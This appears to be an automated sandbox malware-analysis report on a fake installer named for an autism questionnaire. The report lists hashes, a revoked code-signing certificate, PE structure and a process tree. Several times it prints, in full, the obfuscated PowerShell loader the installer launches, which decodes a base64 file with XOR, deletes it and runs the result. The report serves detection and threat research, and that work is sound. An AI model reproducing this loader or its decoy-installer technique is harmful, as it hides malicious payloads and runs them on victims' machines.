                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144057..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):67756
                                                                                            Entropy (8bit):5.725745924531966
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:JDOs355yymmEeRPDcJytgdmxa2dAEslokZLM4kEbQWQvFH0i8n:JDLTTE0FBxiE9XE8hiFn
                                                                                            MD5:25D1B8AAB3AC4F8A9E44E5B470818DF6
                                                                                            SHA1:3AE880B40C06A0C14092E25729BA03E7769DD365
                                                                                            SHA-256:70D5FA6EFCD01C196D1BA1A6207B47FE5457D4AEB3105DF561A462570F79BB04
                                                                                            SHA-512:6AB29E4B241933F8FFBF85535D79E88AF32D198EC43B8EDEB3AB08DC6C55EAD5898CEE8DDBD60C960FE6E894A80A9E68187DD74664FFF9189BA629A379CC6497
                                                                                            Malicious:true

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.99440427005356
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            File name:Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
                                                                                            File size:103560224
                                                                                            MD5:ae5b37182059c7733466788212370e71
                                                                                            SHA1:e6b0ee285d7042834d23743ad8ca188082ac264f
                                                                                            SHA256:44af59a2d70ba23f2f80d80090d11184ef923a746c0c9ea3c81922bd8d899346
                                                                                            SHA512:32cffc0422bc641dc7a5537e0b809ed6ed5540fb4b0876d4158ee01217ccaf04d68bf6547b1ae3a79da3e168e10f5c3d7d6cde219705fb9eeaaeecc4d8ba7c7f
                                                                                            SSDEEP:196608:NppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppC:6oLi
                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                            File Icon

                                                                                            Icon Hash:74f4f4dce4f2e4e4

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x4b5eec
                                                                                            Entrypoint Section:.itext
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                            Time Stamp:0x60B88E27 [Thu Jun 3 08:09:11 2021 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:1
                                                                                            File Version Major:6
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:5a594319a0d69dbc452e748bcf05892e

                                                                                            Authenticode Signature

                                                                                            Signature Valid:false
                                                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                            Signature Validation Error:A certificate was explicitly revoked by its issuer
                                                                                            Error Number:-2146762484
                                                                                            Not Before, Not After
                                                                                            • 8/25/2021 5:00:00 PM 8/24/2022 4:59:59 PM
                                                                                            Subject Chain
                                                                                            • CN=Full Stack s. r. o., O=Full Stack s. r. o., L=Bratislava, C=SK, SERIALNUMBER=53 958 748, OID.1.3.6.1.4.1.311.60.2.1.3=SK, OID.2.5.4.15=Private Organization
                                                                                            Version:3
                                                                                            Thumbprint MD5:B6076F74572111FFBFD755C8D98F21E7
                                                                                            Thumbprint SHA-1:160A9CF7400D11BEFFD349F47136264EE56B6686
                                                                                            Thumbprint SHA-256:9F5A6811259566D82B89ECA78CA84B0B21AEFD783616E1142ED006C67707F892
                                                                                            Serial:0C6B875DE4F598244A6D6751ABFBDFBD

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            add esp, FFFFFFA4h
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            xor eax, eax
                                                                                            mov dword ptr [ebp-3Ch], eax
                                                                                            mov dword ptr [ebp-40h], eax
                                                                                            mov dword ptr [ebp-5Ch], eax
                                                                                            mov dword ptr [ebp-30h], eax
                                                                                            mov dword ptr [ebp-38h], eax
                                                                                            mov dword ptr [ebp-34h], eax
                                                                                            mov dword ptr [ebp-2Ch], eax
                                                                                            mov dword ptr [ebp-28h], eax
                                                                                            mov dword ptr [ebp-14h], eax
                                                                                            mov eax, 004B10F0h
                                                                                            call 00007FDCEC68DB35h
                                                                                            xor eax, eax
                                                                                            push ebp
                                                                                            push 004B65E2h
                                                                                            push dword ptr fs:[eax]
                                                                                            mov dword ptr fs:[eax], esp
                                                                                            xor edx, edx
                                                                                            push ebp
                                                                                            push 004B659Eh
                                                                                            push dword ptr fs:[edx]
                                                                                            mov dword ptr fs:[edx], esp
                                                                                            mov eax, dword ptr [004BE634h]
                                                                                            call 00007FDCEC73025Fh
                                                                                            call 00007FDCEC72FDB2h
                                                                                            lea edx, dword ptr [ebp-14h]
                                                                                            xor eax, eax
                                                                                            call 00007FDCEC6A35A8h
                                                                                            mov edx, dword ptr [ebp-14h]
                                                                                            mov eax, 004C1D84h
                                                                                            call 00007FDCEC688727h
                                                                                            push 00000002h
                                                                                            push 00000000h
                                                                                            push 00000001h
                                                                                            mov ecx, dword ptr [004C1D84h]
                                                                                            mov dl, 01h
                                                                                            mov eax, dword ptr [004237A4h]
                                                                                            call 00007FDCEC6A460Fh
                                                                                            mov dword ptr [004C1D88h], eax
                                                                                            xor edx, edx
                                                                                            push ebp
                                                                                            push 004B654Ah
                                                                                            push dword ptr fs:[edx]
                                                                                            mov dword ptr fs:[edx], esp
                                                                                            call 00007FDCEC7302E7h
                                                                                            mov dword ptr [004C1D90h], eax
                                                                                            mov eax, dword ptr [004C1D90h]
                                                                                            cmp dword ptr [eax+0Ch], 01h
                                                                                            jne 00007FDCEC7368CAh
                                                                                            mov eax, dword ptr [004C1D90h]
                                                                                            mov edx, 00000028h
                                                                                            call 00007FDCEC6A4F04h
                                                                                            mov edx, dword ptr [004C1D90h]

                                                                                            Data Directories

                                                                                            | Name | Virtual Address | Virtual Size | Is in Section |
                                                                                            | IMAGE_DIRECTORY_ENTRY_EXPORT | 0xc4000 | 0x9a | .edata |
                                                                                            | IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2000 | 0xf36 | .idata |
                                                                                            | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0xf57c | .rsrc |
                                                                                            | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
                                                                                            | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x62c0f98 | 0x2488 | |
                                                                                            | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
                                                                                            | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
                                                                                            | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
                                                                                            | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
                                                                                            | IMAGE_DIRECTORY_ENTRY_TLS | 0xc6000 | 0x18 | .rdata |
                                                                                            | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
                                                                                            | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
                                                                                            | IMAGE_DIRECTORY_ENTRY_IAT | 0xc22e4 | 0x244 | .idata |
                                                                                            | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xc3000 | 0x1a4 | .didata |
                                                                                            | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
                                                                                            | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                                                                            Sections

                                                                                            | Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                                                                                            | .text | 0x1000 | 0xb361c | 0xb3800 | False | 0.344863934105 | data | 6.35605820433 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
                                                                                            | .itext | 0xb5000 | 0x1688 | 0x1800 | False | 0.544921875 | data | 5.97275005522 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
                                                                                            | .data | 0xb7000 | 0x37a4 | 0x3800 | False | 0.360979352679 | data | 5.04440056201 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
                                                                                            | .bss | 0xbb000 | 0x6de8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
                                                                                            | .idata | 0xc2000 | 0xf36 | 0x1000 | False | 0.3681640625 | data | 4.89870464796 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
                                                                                            | .didata | 0xc3000 | 0x1a4 | 0x200 | False | 0.345703125 | data | 2.75636286825 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
                                                                                            | .edata | 0xc4000 | 0x9a | 0x200 | False | 0.2578125 | data | 1.87222286659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                                                                                            | .tls | 0xc5000 | 0x18 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
                                                                                            | .rdata | 0xc6000 | 0x5d | 0x200 | False | 0.189453125 | data | 1.38389437522 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                                                                                            | .rsrc | 0xc7000 | 0xf57c | 0xf600 | False | 0.254176194106 | data | 4.75187303433 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

                                                                                            Resources

                                                                                            | Name | RVA | Size | Type | Language | Country |
                                                                                            | RT_ICON | 0xc7588 | 0x18de | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
                                                                                            | RT_ICON | 0xc8e68 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4294905600 | English | United States |
                                                                                            | RT_ICON | 0xcd090 | 0x25a8 | data | English | United States |
                                                                                            | RT_ICON | 0xcf638 | 0x1a68 | data | English | United States |
                                                                                            | RT_ICON | 0xd10a0 | 0x10a8 | data | English | United States |
                                                                                            | RT_ICON | 0xd2148 | 0x988 | data | English | United States |
                                                                                            | RT_ICON | 0xd2ad0 | 0x6b8 | data | English | United States |
                                                                                            | RT_ICON | 0xd3188 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States |
                                                                                            | RT_STRING | 0xd35f0 | 0x360 | data | | |
                                                                                            | RT_STRING | 0xd3950 | 0x260 | data | | |
                                                                                            | RT_STRING | 0xd3bb0 | 0x45c | data | | |
                                                                                            | RT_STRING | 0xd400c | 0x40c | data | | |
                                                                                            | RT_STRING | 0xd4418 | 0x2d4 | data | | |
                                                                                            | RT_STRING | 0xd46ec | 0xb8 | data | | |
                                                                                            | RT_STRING | 0xd47a4 | 0x9c | data | | |
                                                                                            | RT_STRING | 0xd4840 | 0x374 | data | | |
                                                                                            | RT_STRING | 0xd4bb4 | 0x398 | data | | |
                                                                                            | RT_STRING | 0xd4f4c | 0x368 | data | | |
                                                                                            | RT_STRING | 0xd52b4 | 0x2a4 | data | | |
                                                                                            | RT_RCDATA | 0xd5558 | 0x10 | data | | |
                                                                                            | RT_RCDATA | 0xd5568 | 0x2c4 | data | | |
                                                                                            | RT_RCDATA | 0xd582c | 0x2c | data | | |
                                                                                            | RT_GROUP_ICON | 0xd5858 | 0x76 | data | English | United States |
                                                                                            | RT_VERSION | 0xd58d0 | 0x584 | data | English | United States |
                                                                                            | RT_MANIFEST | 0xd5e54 | 0x726 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States |

                                                                                            Imports

                                                                                            | DLL | Import |
                                                                                            | kernel32.dll | GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale |
                                                                                            | comctl32.dll | InitCommonControls |
                                                                                            | version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW |
                                                                                            | user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW |
                                                                                            | oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate |
                                                                                            | netapi32.dll | NetWkstaGetInfo, NetApiBufferFree |
                                                                                            | advapi32.dll | RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW |

                                                                                            Exports

                                                                                            | Name | Ordinal | Address |
                                                                                            | TMethodImplementationIntercept | 3 | 0x454060 |
                                                                                            | __dbk_fcall_wrapper | 2 | 0x40d0a0 |
                                                                                            | dbkFCallWrapperAddr | 1 | 0x4be63c |

                                                                                            Version Infos

                                                                                            | Description | Data |
                                                                                            | LegalCopyright | (c) InvestTech |
                                                                                            | FileVersion | |
                                                                                            | CompanyName | |
                                                                                            | Comments | This installation was built with Inno Setup. |
                                                                                            | ProductName | SlimReader |
                                                                                            | ProductVersion | 1.4.1.2 |
                                                                                            | FileDescription | SlimReader Setup |
                                                                                            | OriginalFileName | |
                                                                                            | Translation | 0x0000 0x04b0 |

                                                                                            Possible Origin

                                                                                            | Language of compilation system | Country where language is spoken | Map |
                                                                                            | English | United States | |

                                                                                            Network Behavior

                                                                                            No network behavior found

                                                                                            System Behavior

                                                                                            General

                                                                                            Start time:14:40:26
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:103560224 bytes
                                                                                            MD5 hash:AE5B37182059C7733466788212370E71
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Reputation:low

                                                                                            General

                                                                                            Start time:14:40:27
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:3156992 bytes
                                                                                            MD5 hash:8693B9CFB8B4C466AE12CCDC2FEB46CE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, Metadefender
                                                                                            • Detection: 9%, ReversingLabs
                                                                                            Reputation:low

                                                                                            General

                                                                                            Start time:14:40:30
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
                                                                                            Imagebase:0xfe0000
                                                                                            File size:2571312 bytes
                                                                                            MD5 hash:B969CF0C7B2C443A99034881E8C8740A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate

                                                                                            General

                                                                                            Start time:14:40:30
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
                                                                                            Imagebase:0xfe0000
                                                                                            File size:2571312 bytes
                                                                                            MD5 hash:B969CF0C7B2C443A99034881E8C8740A
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate

                                                                                            General

                                                                                            Start time:14:40:32
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:14:40:33
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:14:40:33
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:14:40:33
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:14:40:33
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:14:40:34
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:14:40:34
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
